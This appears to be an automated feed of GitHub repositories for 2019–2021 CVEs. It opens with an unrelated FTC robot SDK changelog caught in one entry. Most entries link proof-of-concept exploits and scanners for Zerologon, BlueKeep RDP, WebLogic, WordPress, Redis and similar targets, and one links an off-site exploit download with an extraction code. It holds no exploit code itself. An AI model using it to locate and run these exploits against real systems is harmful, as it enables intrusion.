Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.** : [chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020](https://api.github.com/repos/chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020) create time: 2021-03-08T11:34:11Z

**A POC for IBM Datapower Authenticated Redis RCE Exploit abusing the Test Message Function (CVE-2020-5014)** : [copethomas/datapower-redis-rce-exploit](https://api.github.com/repos/copethomas/datapower-redis-rce-exploit) create time: 2020-10-18T10:32:32Z

**The sample CVE-ID 2017-2020 in VRM paper** : [vidaAhmadi/sample-CVE](https://api.github.com/repos/vidaAhmadi/sample-CVE) create time: 2021-02-28T20:53:14Z

**CVE-2020-12351** : [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://api.github.com/repos/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP) create time: 2021-03-01T20:44:50Z

**2020l4web-app-mockup-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-app-mockup-DanCvejn](https://api.github.com/repos/pslib-cz/2020l4web-app-mockup-DanCvejn) create time: 2021-02-22T13:51:58Z

**Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal** : [lucxssouza/CVE-2020-29134](https://api.github.com/repos/lucxssouza/CVE-2020-29134) create time: 2021-02-11T13:44:40Z

**Will write a python script for exploiting this vulnerability ** : [k0rup710n/Wordpress-CVE-2020-25213](https://api.github.com/repos/k0rup710n/Wordpress-CVE-2020-25213) create time: 2021-03-12T22:58:43Z

**None** : [exploitblizzard/CVE-2020-0601-spoofkey](https://api.github.com/repos/exploitblizzard/CVE-2020-0601-spoofkey) create time: 2020-03-03T08:49:47Z

**CVE-2020-0096-StrandHogg2 复现** : [tea9/CVE-2020-0096-StrandHogg2](https://api.github.com/repos/tea9/CVE-2020-0096-StrandHogg2) create time: 2020-09-07T10:25:25Z

**Zerologon Check and Exploit - Discovered by Tom Tervoort of Secura and expanded on @Dirkjanm's cve-2020-1472 coded example** : [sho-luv/zerologon](https://api.github.com/repos/sho-luv/zerologon) create time: 2021-01-20T21:38:47Z

**PoC demonstrating the use of cve-2020-1034 for privilege escalation** : [yardenshafir/CVE-2020-1034](https://api.github.com/repos/yardenshafir/CVE-2020-1034) create time: 2020-11-23T10:24:07Z

**None** : [cpandya2909/CVE-2020-15778](https://api.github.com/repos/cpandya2909/CVE-2020-15778) create time: 2020-07-18T05:15:05Z

**Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability** : [cssxn/CVE-2020-17136](https://api.github.com/repos/cssxn/CVE-2020-17136) create time: 2021-03-18T16:13:23Z

**Django StringAgg SQL Injection (CVE-2020-7471)** : [secoba/DjVul_StringAgg](https://api.github.com/repos/secoba/DjVul_StringAgg) create time: 2020-02-13T07:55:44Z

**CVE-2020-27223 Vulnerability App & PoC** : [motikan2010/CVE-2020-27223](https://api.github.com/repos/motikan2010/CVE-2020-27223) create time: 2021-03-19T03:50:45Z

**A vulnerability scanner that detects CVE-2020-17519 vulnerabilities.** : [Osyanina/westone-CVE-2020-17519-scanner](https://api.github.com/repos/Osyanina/westone-CVE-2020-17519-scanner) create time: 2021-02-25T11:06:05Z

**A vulnerability scanner that detects CVE-2020-14883 vulnerabilities.** : [Osyanina/westone-CVE-2020-14883-scanner](https://api.github.com/repos/Osyanina/westone-CVE-2020-14883-scanner) create time: 2021-02-25T11:21:56Z

**CVE-2020-0022 vulnerability exploitation on Bouygues BBox Miami (Android TV 8.0 - ARM32 Cortex A9)** : [Polo35/CVE-2020-0022](https://api.github.com/repos/Polo35/CVE-2020-0022) create time: 2020-08-24T19:33:10Z

**Proof of concept for CVE-2020-11819 and CVE-2020-15946** : [danyx07/PoC-RCE-Rukovoditel](https://api.github.com/repos/danyx07/PoC-RCE-Rukovoditel) create time: 2021-03-25T16:03:24Z

**None** : [code-developers/CVE-2020-11932](https://api.github.com/repos/code-developers/CVE-2020-11932) create time: 2021-03-27T07:14:58Z

**None** : [okanulkr/CurveBall-CVE-2020-0601-PoC](https://api.github.com/repos/okanulkr/CurveBall-CVE-2020-0601-PoC) create time: 2021-01-17T11:53:28Z

**Automated Root Script for MediaTek armv8 devices using MediaTek-SU/mtk-su (CVE-2020-0069).** : [R0rt1z2/AutomatedRoot](https://api.github.com/repos/R0rt1z2/AutomatedRoot) create time: 2019-09-06T12:12:48Z

**None** : [Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat](https://api.github.com/repos/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat) create time: 2021-03-28T03:30:44Z

**Public PoC Disclosure for CVE-2020-23839 - GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal** : [boku7/CVE-2020-23839](https://api.github.com/repos/boku7/CVE-2020-23839) create time: 2021-03-30T00:39:25Z

**D-Link DCS系列账号密码信息泄露漏洞,通过脚本获取账号密码,可批量。** : [MzzdToT/CVE-2020-25078](https://api.github.com/repos/MzzdToT/CVE-2020-25078) create time: 2021-03-30T06:57:31Z

**CVE-2020-27955 Poc** : [NeoDarwin/CVE-2020-27955](https://api.github.com/repos/NeoDarwin/CVE-2020-27955) create time: 2021-03-30T07:12:11Z

**test** : [f0ns1/CVE-2020](https://api.github.com/repos/f0ns1/CVE-2020) create time: 2021-03-30T15:24:13Z

**None** : [feihong-cs/Attacking_Shiro_with_CVE_2020_2555](https://api.github.com/repos/feihong-cs/Attacking_Shiro_with_CVE_2020_2555) create time: 2021-03-20T15:28:09Z

**CVE-2020-17136 exploit** : [xyddnljydd/CVE-2020-17136](https://api.github.com/repos/xyddnljydd/CVE-2020-17136) create time: 2021-03-18T11:16:36Z

**CVE Data Analysis, CVE Monitor, CVE EXP Prediction Based on Deep Learning. 1999-2020年存量CVE数据分析、监控CVE增量更新、基于深度学习的CVE EXP预测和自动化推送** : [404notf0und/CVE-Flow](https://api.github.com/repos/404notf0und/CVE-Flow) create time: 2020-06-15T14:56:18Z

**Study on CVE-2020-13401 vulnerability of containers in dockers older than 19.03.11** : [mmzaeimi/Docker-Container-CVE-2020-13401](https://api.github.com/repos/mmzaeimi/Docker-Container-CVE-2020-13401) create time: 2021-03-31T17:45:10Z

**GitLab 12.9.0 Arbitrary File Read ** : [thewhiteh4t/cve-2020-10977](https://api.github.com/repos/thewhiteh4t/cve-2020-10977) create time: 2020-11-20T15:40:03Z

**An issue was discovered in includes/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS running this software, and execute commands on the system including ones for uploading of files and execution of code.** : [gerberop/CVE-2020-24572-POC](https://api.github.com/repos/gerberop/CVE-2020-24572-POC) create time: 2021-04-01T01:33:26Z

**None** : [Vulnmachines/apache-ofbiz-CVE-2020-9496](https://api.github.com/repos/Vulnmachines/apache-ofbiz-CVE-2020-9496) create time: 2021-04-01T09:58:23Z

**Alibaba-Nacos-Unauthorized/ApacheDruid-RCE_CVE-2021-25646/MS-Exchange-SSRF-CVE-2021-26885/Oracle-WebLogic-CVE-2021-2109_RCE/RG-CNVD-2021-14536/RJ-SSL-VPN-UltraVires/Redis-Unauthorized-RCE/TDOA-V11.7-GetOnlineCookie/VMware-vCenter-GetAnyFile/yongyou-GRP-U8-XXE/Oracle-WebLogic-CVE-2020-14883/Oracle-WebLogic-CVE-2020-14882/Apache-Solr-GetAnyFile/F5-BIG-IP-CVE-2021-22986/Sonicwall-SSL-VPN-RCE/GitLab-Graphql-CNVD-2021-14193/D-Link-DCS-CVE-2020-25078/WLAN-AP-WEA453e-RCE** : [Yang0615777/PocList](https://api.github.com/repos/Yang0615777/PocList) create time: 2021-03-11T22:49:17Z

**None** : [Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922](https://api.github.com/repos/Wowfunhappy/Fix-Apple-Mail-CVE-2020-9922) create time: 2021-04-02T15:51:03Z

**PoC (Proof of Concept) - CVE-2020-17453** : [JHHAX/CVE-2020-17453-PoC](https://api.github.com/repos/JHHAX/CVE-2020-17453-PoC) create time: 2021-04-03T13:49:39Z

**None** : [piruprohacking/CVE-2020-25213](https://api.github.com/repos/piruprohacking/CVE-2020-25213) create time: 2021-04-03T13:52:21Z

**None** : [password520/cve-2020-1337-poc](https://api.github.com/repos/password520/cve-2020-1337-poc) create time: 2021-04-04T02:56:02Z

**浪潮ClusterEngineV4.0 远程命令执行漏洞扫描脚本。** : [MzzdToT/CVE-2020-21224](https://api.github.com/repos/MzzdToT/CVE-2020-21224) create time: 2021-04-04T07:38:58Z

**Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340** : [zhzyker/exphub](https://api.github.com/repos/zhzyker/exphub) create time: 2020-04-01T09:33:35Z

**Exploit Code for CVE-2020-1472 aka Zerologon** : [Udyz/Zerologon](https://api.github.com/repos/Udyz/Zerologon) create time: 2021-04-06T02:48:35Z

**CVE-2019-6467 (BIND nxdomain-redirect)** : [knqyf263/CVE-2019-6467](https://api.github.com/repos/knqyf263/CVE-2019-6467) create time: 2019-04-25T03:26:42Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271** : [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://api.github.com/repos/Yuusuke4/WebLogic_CNVD_C_2019_48814) create time: 2019-04-25T12:18:16Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm** : [7kbstorm/WebLogic_CNVD_C2019_48814](https://api.github.com/repos/7kbstorm/WebLogic_CNVD_C2019_48814) create time: 2019-04-25T12:33:31Z

** Confluence Widget Connector path traversal (CVE-2019-3396)** : [vntest11/confluence_CVE-2019-3396](https://api.github.com/repos/vntest11/confluence_CVE-2019-3396) create time: 2019-04-28T05:59:21Z

**CVE-2019-2725poc汇总 更新绕过CVE-2017-10271补丁POC** : [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://api.github.com/repos/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961) create time: 2019-04-25T03:07:53Z

**None** : [jiansiting/CVE-2019-3719](https://api.github.com/repos/jiansiting/CVE-2019-3719) create time: 2019-05-01T04:43:55Z

**A C# module to detect if a Jenkins server is vulnerable to the RCE vulnerability found in CVE-2019-1003000 (chained with CVE-2018-1000861 for pre-auth RCE)** : [1NTheKut/CVE-2019-1003000_RCE-DETECTION](https://api.github.com/repos/1NTheKut/CVE-2019-1003000_RCE-DETECTION) create time: 2019-04-24T23:52:42Z

**None** : [lasensio/cve-2019-2725](https://api.github.com/repos/lasensio/cve-2019-2725) create time: 2019-05-01T22:25:14Z

**WordPress crop-image exploitation** : [synacktiv/CVE-2019-8942](https://api.github.com/repos/synacktiv/CVE-2019-8942) create time: 2019-05-02T08:41:11Z

**A proof of concept for Metasploit's CVE-2019-5624 vulnerability (Rubyzip insecure ZIP handling RCE) ** : [VoidSec/CVE-2019-5624](https://api.github.com/repos/VoidSec/CVE-2019-5624) create time: 2019-05-02T14:54:08Z

**None** : [davidmthomsen/CVE-2019-2725](https://api.github.com/repos/davidmthomsen/CVE-2019-2725) create time: 2019-05-02T21:09:36Z

**CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)** : [hash3liZer/CVE-2019-9978](https://api.github.com/repos/hash3liZer/CVE-2019-9978) create time: 2019-05-03T05:57:44Z

**None** : [leerina/CVE-2019-2725](https://api.github.com/repos/leerina/CVE-2019-2725) create time: 2019-05-05T08:34:20Z

**cve-2019-9978** : [cved-sources/cve-2019-9978](https://api.github.com/repos/cved-sources/cve-2019-9978) create time: 2019-05-06T20:11:20Z

**cve-2019-10678** : [cved-sources/cve-2019-10678](https://api.github.com/repos/cved-sources/cve-2019-10678) create time: 2019-05-06T20:15:47Z

**Wordpress Social Warfare Remote Code Execution (AUTO UPLOAD SHELL)** : [KTN1990/CVE-2019-9978](https://api.github.com/repos/KTN1990/CVE-2019-9978) create time: 2019-05-06T04:48:43Z

**A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6** : [alt3kx/CVE-2019-10685](https://api.github.com/repos/alt3kx/CVE-2019-10685) create time: 2019-04-02T12:50:46Z

**Zimbra邮件系统漏洞 XXE/RCE/SSRF/Upload GetShell Exploit 1. (CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit)** : [k8gege/ZimbraExploit](https://api.github.com/repos/k8gege/ZimbraExploit) create time: 2019-05-06T15:47:20Z

**Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git** : [panzouh/Docker-Runc-Exploit](https://api.github.com/repos/panzouh/Docker-Runc-Exploit) create time: 2019-05-09T05:45:21Z

**CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3** : [mpgn/CVE-2019-9978](https://api.github.com/repos/mpgn/CVE-2019-9978) create time: 2019-03-25T23:38:58Z

**Linux privilege escalation exploit via snapd (CVE-2019-7304)** : [initstring/dirty_sock](https://api.github.com/repos/initstring/dirty_sock) create time: 2019-02-12T06:02:06Z

**None** : [zhusx110/cve-2019-2725](https://api.github.com/repos/zhusx110/cve-2019-2725) create time: 2019-05-10T09:07:58Z

**CVE-2019-0211-apache & CVE-2019-6977-imagecolormatch** : [ozkanbilge/Apache-Exploit-2019](https://api.github.com/repos/ozkanbilge/Apache-Exploit-2019) create time: 2019-05-12T10:08:57Z

**None** : [chiaifan/CVE-2019-2615](https://api.github.com/repos/chiaifan/CVE-2019-2615) create time: 2019-05-12T16:25:28Z

**None** : [iceMatcha/CNTA-2019-0014xCVE-2019-2725](https://api.github.com/repos/iceMatcha/CNTA-2019-0014xCVE-2019-2725) create time: 2019-04-28T02:18:42Z

**None** : [s1xg0d/CVE-2019-3396](https://api.github.com/repos/s1xg0d/CVE-2019-3396) create time: 2019-04-10T07:39:42Z

**Potential malicious code execution via CHM hijacking (CVE-2019-9896)** : [yasinyilmaz/vuln-chm-hijack](https://api.github.com/repos/yasinyilmaz/vuln-chm-hijack) create time: 2019-05-13T16:17:06Z

**A Win7 RDP exploit** : [SherlockSec/CVE-2019-0708](https://api.github.com/repos/SherlockSec/CVE-2019-0708) create time: 2019-05-14T21:47:33Z

**CVE-2019-0708** : [yetiddbb/CVE-2019-0708-PoC](https://api.github.com/repos/yetiddbb/CVE-2019-0708-PoC) create time: 2019-05-15T02:03:50Z

**Numpy deserialization command execution** : [RayScri/CVE-2019-6446](https://api.github.com/repos/RayScri/CVE-2019-6446) create time: 2019-05-15T01:39:53Z

**CVE-2019-0708-exploit** : [p0p0p0/CVE-2019-0708-exploit](https://api.github.com/repos/p0p0p0/CVE-2019-0708-exploit) create time: 2019-05-15T02:24:21Z

**Using CVE-2019-0708 to Locally Promote Privileges in Windows 10 System** : [rockmelodies/CVE-2019-0708-Exploit](https://api.github.com/repos/rockmelodies/CVE-2019-0708-Exploit) create time: 2019-05-15T02:58:04Z

**Dark Net Sunset New Release CVE-2019-0708** : [xiyangzuishuai/Dark-Network-CVE-2019-0708](https://api.github.com/repos/xiyangzuishuai/Dark-Network-CVE-2019-0708) create time: 2019-05-15T07:09:24Z

**CVE-2019-0708** : [temp-user-2014/CVE-2019-0708](https://api.github.com/repos/temp-user-2014/CVE-2019-0708) create time: 2019-05-15T07:24:34Z

**exploit CVE-2019-0708 RDS** : [hotdog777714/RDS_CVE-2019-0708](https://api.github.com/repos/hotdog777714/RDS_CVE-2019-0708) create time: 2019-05-15T15:09:37Z

**CVE-2019-0708 exp** : [matengfei000/CVE-2019-0708](https://api.github.com/repos/matengfei000/CVE-2019-0708) create time: 2019-05-15T04:05:07Z

**Proof of concept exploit for CVE-2019-0708** : [areusecure/CVE-2019-0708](https://api.github.com/repos/areusecure/CVE-2019-0708) create time: 2019-05-15T09:25:04Z

**EXPloit-poc: https://pan.baidu.com/s/184gN1tJVIOYqOjaezM_VsA 提取码:e2k8** : [sbkcbig/CVE-2019-0708-EXPloit-3389](https://api.github.com/repos/sbkcbig/CVE-2019-0708-EXPloit-3389) create time: 2019-05-15T14:00:38Z

**proof of concept exploit for Microsoft Windows 7 and Server 2008 RDP vulnerability** : [hook-s3c/CVE-2019-0708-poc](https://api.github.com/repos/hook-s3c/CVE-2019-0708-poc) create time: 2019-05-14T21:00:50Z

**Testing my new bot out** : [pry0cc/cve-2019-0708-2](https://api.github.com/repos/pry0cc/cve-2019-0708-2) create time: 2019-05-15T09:32:28Z

